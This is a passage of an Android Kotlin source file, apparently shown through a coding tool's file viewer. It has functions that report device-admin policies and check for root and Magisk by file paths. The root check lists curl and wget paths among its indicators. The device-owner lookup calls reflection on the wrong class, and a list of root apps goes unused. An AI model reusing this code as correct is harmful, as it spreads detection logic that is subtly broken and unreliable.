   397тЖТ   456тЖТ   456тЖТ   456тЖТ            "Error: ${e.message}"
   398тЖТ   457тЖТ   457тЖТ   457тЖТ        }
   399тЖТ   458тЖТ   458тЖТ   458тЖТ    }
   400тЖТ   459тЖТ   459тЖТ   459тЖТ
   401тЖТ   460тЖТ   460тЖТ   460тЖТ    // ===== DEVICE ADMIN STATUS =====
   402тЖТ   461тЖТ   461тЖТ   461тЖТ    fun deviceAdminStatus(context: Context): Map<String, Any> {
   403тЖТ   462тЖТ   462тЖТ   462тЖТ        return try {
   404тЖТ   463тЖТ   463тЖТ   463тЖТ            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   405тЖТ   464тЖТ   464тЖТ   464тЖТ            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   406тЖТ   465тЖТ   465тЖТ   465тЖТ            val isAdmin = dpm.isAdminActive(adminComponent)
   407тЖТ   466тЖТ   466тЖТ   466тЖТ            
   408тЖТ   467тЖТ   467тЖТ   467тЖТ            val policies = mutableListOf<String>()
   409тЖТ   468тЖТ   468тЖТ   468тЖТ            if (isAdmin) {
   410тЖТ   469тЖТ   469тЖТ   469тЖТ                if (dpm.getPasswordQuality(adminComponent) != DevicePolicyManager.PASSWORD_QUALITY_UNSPECIFIED) {
   411тЖТ   470тЖТ   470тЖТ   470тЖТ                    policies.add("password_quality")
   412тЖТ   471тЖТ   471тЖТ   471тЖТ                }
   413тЖТ   472тЖТ   472тЖТ   472тЖТ                if (dpm.getPasswordMinimumLength(adminComponent) > 0) {
   414тЖТ   473тЖТ   473тЖТ   473тЖТ                    policies.add("password_minimum_length")
   415тЖТ   474тЖТ   474тЖТ   474тЖТ                }
   416тЖТ   475тЖТ   475тЖТ   475тЖТ                if (dpm.getMaximumFailedPasswordsForWipe(adminComponent) > 0) {
   417тЖТ   476тЖТ   476тЖТ   476тЖТ                    policies.add("maximum_failed_passwords")
   418тЖТ   477тЖТ   477тЖТ   477тЖТ                }
   419тЖТ   478тЖТ   478тЖТ   478тЖТ                if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP) {
   420тЖТ   479тЖТ   479тЖТ   479тЖТ                    if (dpm.isDeviceOwnerApp(context.packageName)) {
   421тЖТ   480тЖТ   480тЖТ   480тЖТ                        policies.add("device_owner")
   422тЖТ   481тЖТ   481тЖТ   481тЖТ                    }
   423тЖТ   482тЖТ   482тЖТ   482тЖТ                    if (dpm.isProfileOwnerApp(context.packageName)) {
   424тЖТ   483тЖТ   483тЖТ   483тЖТ                        policies.add("profile_owner")
   425тЖТ   484тЖТ   484тЖТ   484тЖТ                    }
   426тЖТ   485тЖТ   485тЖТ   485тЖТ                }
   427тЖТ   486тЖТ   486тЖТ   486тЖТ            }
   428тЖТ   487тЖТ   487тЖТ   487тЖТ            
   429тЖТ   488тЖТ   488тЖТ   488тЖТ            mapOf(
   430тЖТ   489тЖТ   489тЖТ   489тЖТ                "is_device_admin" to isAdmin,
   431тЖТ   490тЖТ   490тЖТ   490тЖТ                "active_admins" to (dpm.activeAdmins?.size ?: 0),
   432тЖТ   491тЖТ   491тЖТ   491тЖТ                "is_device_owner" to if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP) dpm.isDeviceOwnerApp(context.packageName) else false,
   433тЖТ   492тЖТ   492тЖТ   492тЖТ                "is_profile_owner" to if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP) dpm.isProfileOwnerApp(context.packageName) else false,
   434тЖТ   493тЖТ   493тЖТ   493тЖТ                "policies" to policies,
   435тЖТ   494тЖТ   494тЖТ   494тЖТ                "device_owner_name" to try { @Suppress("DEPRECATION") (java.lang.reflect.Method::class.java.getDeclaredMethod("getDeviceOwnerName")).let { m -> m.invoke(dpm)?.toString() ?: "" } } catch (e: Exception) { "" }
   436тЖТ   495тЖТ   495тЖТ   495тЖТ            )
   437тЖТ   496тЖТ   496тЖТ   496тЖТ        } catch (e: Exception) {
   438тЖТ   497тЖТ   497тЖТ   497тЖТ            Log.e(TAG, "Device admin status error", e)
   439тЖТ   498тЖТ   498тЖТ   498тЖТ            mapOf("error" to (e.message ?: ""))
   440тЖТ   499тЖТ   499тЖТ   499тЖТ        }
   441тЖТ   500тЖТ   500тЖТ   500тЖТ    }
   442тЖТ   501тЖТ   501тЖТ   501тЖТ
   443тЖТ   502тЖТ   502тЖТ   502тЖТ    // ===== CHECK ROOT =====
   444тЖТ   503тЖТ   503тЖТ   503тЖТ    fun checkRoot(): Map<String, Any> {
   445тЖТ   504тЖТ   504тЖТ   504тЖТ        val rootPaths = arrayOf(
   446тЖТ   505тЖТ   505тЖТ   505тЖТ            "/system/bin/su",
   447тЖТ   506тЖТ   506тЖТ   506тЖТ            "/system/xbin/su",
   448тЖТ   507тЖТ   507тЖТ   507тЖТ            "/sbin/su",
   449тЖТ   508тЖТ   508тЖТ   508тЖТ            "/system/bin/failsafe/su",
   450тЖТ   509тЖТ   509тЖТ   509тЖТ            "/data/local/xbin/su",
   451тЖТ   510тЖТ   510тЖТ   510тЖТ            "/data/local/bin/su",
   452тЖТ   511тЖТ   511тЖТ   511тЖТ            "/system/sd/xbin/su",
   453тЖТ   512тЖТ   512тЖТ   512тЖТ            "/system/bin/curl",
   454тЖТ   513тЖТ   513тЖТ   513тЖТ            "/system/bin/wget",
   455тЖТ   514тЖТ   514тЖТ   514тЖТ            "/data/local/su",
   456тЖТ   515тЖТ   515тЖТ   515тЖТ            "/su/bin/su",
   457тЖТ   516тЖТ   516тЖТ   516тЖТ            "/magisk/.core/bin/su",
   458тЖТ   517тЖТ   517тЖТ   517тЖТ            "/apex/com.android.runtime/bin/su"
   459тЖТ   518тЖТ   518тЖТ   518тЖТ        )
   460тЖТ   519тЖТ   519тЖТ   519тЖТ        
   461тЖТ   520тЖТ   520тЖТ   520тЖТ        var hasRoot = false
   462тЖТ   521тЖТ   521тЖТ   521тЖТ        val foundPaths = mutableListOf<String>()
   463тЖТ   522тЖТ   522тЖТ   522тЖТ        
   464тЖТ   523тЖТ   523тЖТ   523тЖТ        for (path in rootPaths) {
   465тЖТ   524тЖТ   524тЖТ   524тЖТ            val file = File(path)
   466тЖТ   525тЖТ   525тЖТ   525тЖТ            if (file.exists()) {
   467тЖТ   526тЖТ   526тЖТ   526тЖТ                hasRoot = true
   468тЖТ   527тЖТ   527тЖТ   527тЖТ                foundPaths.add(path)
   469тЖТ   528тЖТ   528тЖТ   528тЖТ            }
   470тЖТ   529тЖТ   529тЖТ   529тЖТ        }
   471тЖТ   530тЖТ   530тЖТ   530тЖТ        
   472тЖТ   531тЖТ   531тЖТ   531тЖТ        // Also check for root management apps
   473тЖТ   532тЖТ   532тЖТ   532тЖТ        val rootApps = arrayOf(
   474тЖТ   533тЖТ   533тЖТ   533тЖТ            "com.koushikdutta.superuser",
   475тЖТ   534тЖТ   534тЖТ   534тЖТ            "com.thirdparty.superuser",
   476тЖТ   535тЖТ   535тЖТ   535тЖТ            "eu.chainfire.supersu",
   477тЖТ   536тЖТ   536тЖТ   536тЖТ            "com.noshufou.android.su",
   478тЖТ   537тЖТ   537тЖТ   537тЖТ            "com.topjohnwu.magisk"
   479тЖТ   538тЖТ   538тЖТ   538тЖТ        )
   480тЖТ   539тЖТ   539тЖТ   539тЖТ        
   481тЖТ   540тЖТ   540тЖТ   540тЖТ        return mapOf(
   482тЖТ   541тЖТ   541тЖТ   541тЖТ            "rooted" to hasRoot,
   483тЖТ   542тЖТ   542тЖТ   542тЖТ            "found_paths" to foundPaths,
   484тЖТ   543тЖТ   543тЖТ   543тЖТ            "message" to if (hasRoot) "Device is rooted" else "Device is not rooted"
   485тЖТ   544тЖТ   544тЖТ   544тЖТ        )
   486тЖТ   545тЖТ   545тЖТ   545тЖТ    }
   487тЖТ   546тЖТ   546тЖТ   546тЖТ    
   488тЖТ   547тЖТ   547тЖТ   547тЖТ    fun checkMagisk(): Map<String, Any> {
   489тЖТ   548тЖТ   548тЖТ   548тЖТ        val magiskPaths = arrayOf(
   490тЖТ   549тЖТ   549тЖТ   549тЖТ            "/sbin/.magisk",
   491тЖТ   550тЖТ   550тЖТ   550тЖТ            "/cache/.magisk",
   492тЖТ   551тЖТ   551тЖТ   551тЖТ            "/data/adb/magisk",
   493тЖТ   552тЖТ   552тЖТ   552тЖТ            "/data/adb/ksu",
   494тЖТ   553тЖТ   553тЖТ   553тЖТ            "/data/adb/ap"
   495тЖТ   554тЖТ   554тЖТ   554тЖТ        )
   496тЖТ   555тЖТ   555тЖТ   555тЖТ        
   497тЖТ   556тЖТ   556тЖТ   556тЖТ        var hasMagisk = false
   498тЖТ   557тЖТ   557тЖТ   557тЖТ        val foundPaths = mutableListOf<String>()
   499тЖТ   558тЖТ   558тЖТ   558тЖТ        
   500тЖТ   559тЖТ   559тЖТ   559тЖТ        for (path in magiskPaths) {
   501тЖТ
   502тЖТ[showing lines 60-559 of 830; use offset=560 with limit to continue reading]